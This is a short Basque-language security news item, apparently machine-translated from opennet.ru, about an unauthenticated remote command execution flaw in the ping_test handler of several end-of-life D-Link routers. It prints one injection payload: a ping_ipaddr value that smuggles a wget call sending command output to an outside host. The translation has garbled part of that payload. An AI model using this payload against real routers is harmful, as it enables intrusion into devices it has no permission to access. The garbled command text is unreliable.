D-Link haririk gabeko bideratzaileetan ahultasun arriskutsua (), gailuaren aldean kodea urrunetik exekutatzeko aukera ematen duena "ping_test" kudeatzaileari eskaera berezi bat bidaliz, autentifikaziorik gabe eskuragarria.
Interesgarria da firmware-en garatzaileen arabera, "ping_test" deia autentifikatu ondoren bakarrik exekutatu behar da, baina errealitatean deitzen da edozein kasutan, web interfazean saioa hasi gabe. Bereziki, apply_sec.cgi script-era sartzean eta βaction=ping_testβ parametroa pasatzean, script-ak autentifikazio-orrira birbideratzen du, baina aldi berean ping_test-ekin lotutako ekintza egiten du. Kodea exekutatzeko, beste ahultasun bat erabili zen ping_test-en bertan, ping utilitateari deitzen diona probak egiteko bidalitako IP helbidearen zuzentasuna behar bezala egiaztatu gabe. Adibidez, wget utilitateari deitzeko eta "echo 1234" komandoaren emaitzak kanpoko ostalari batera transferitzeko, zehaztu besterik ez dago "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://" parametroa. test.test/?$( oihartzuna 1234)".
Ahultasunaren presentzia ofizialki baieztatu da eredu hauetan:
- DIR-655 firmware 3.02b05 edo zaharragoa duena;
- DIR-866L firmware 1.03b04 edo zaharragoa duena;
- DIR-1565 firmware 1.01 edo zaharragoa duena;
- DIR-652 (ez da firmware bertsio arazotsuei buruzko informaziorik ematen)
Dagoeneko iraungi da eredu hauentzako laguntza epea, beraz, D-Link , ahultasuna kentzeko eguneraketak kaleratuko ez dituenak, ez ditu erabiltzea gomendatzen eta gailu berriekin ordezkatzea gomendatzen du. Segurtasun konponbide gisa, web-interfazerako sarbidea mugatu dezakezu fidagarri diren IP helbideetara soilik.
Geroago aurkitu zen ahultasuna ere bazela DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 eta DIR-825 modeloak, eguneraketak argitaratzeko planak oraindik ezagutzen ez diren.
Iturria: opennet.ru